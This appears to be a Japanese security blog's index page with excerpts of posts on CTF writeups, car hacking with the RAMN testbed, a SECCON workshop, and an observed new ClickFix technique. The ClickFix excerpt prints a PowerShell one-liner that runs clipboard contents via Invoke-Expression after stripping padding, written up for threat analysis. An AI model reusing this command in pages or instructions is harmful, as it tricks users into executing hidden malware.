実行コマンドを隠そうとする新しいClickFixの手法

ClickFixで実行されるコマンドで、以下のようなものを観測した。

powershell -c "Invoke-Expression(([System.Text.StringBuilder]::new((Get-Clipboard -Raw))).Remove(0, 256).ToString());"

私がこのコマンドを見つけたのは1週間ほど前のことである。このようなコマンドを用いる事例について書かれた情報が見つからなかったのでここに記す。先行文献があったら教えてほしい。

続きを読む

DefCamp Capture the Flag (D-CTF) 2025 Quals writeup

チームで参加してた。上位10チームがルーマニアでの決勝に行ける。上位30チームはwriteupの提出が必須。ということは7チーム提出しなければルーマニアに行ける。さすがにそれはないだろう。残念。

自分は4問解いた。EasyとMediumしか解けてないのが悔しい。

続きを読む

RAMNでカーハッキングを始めよう

RAMNは車載ネットワークのテストベッドである。RAMNの設計はオープンソースとなっており、GitHubレポジトリにある設計データを使って誰でもハードウェアを作成することができる。今回はそれを作る話。

続きを読む

SECCON13 電脳会議でワークショップをやった

タイトルの通り、SECCON13 電脳会議でワークショップを提供した。3/2 14:00-17:00@Room2のOffensive Security Lab Japan。

続きを読む

防衛省サイバーコンテスト 2025 writeup

全完して7位。1位のst98氏は午前中に終えるという驚異的なスピード。すげえよ。

全体的に難易度は低めで初~中級者向けだった。前回よりも簡単に感じた。

いつも通りwriteupを書いていく。できるだけ初学者にも解く手順がわかるように書いているつもり。わからない点があったら答えるので何らかの形で聞いてほしい。

続きを読む

Automotive CTF Japan決勝に参加した&writeup

9/13(金)に行われたAutomotive CTF Japanの決勝に「TeamONE」のメンバーとして参加してきた。結果は2位で、米国デトロイトで開催される「Automotive CTF 2024」の決勝に参加できることに。

決勝の結果
続きを読む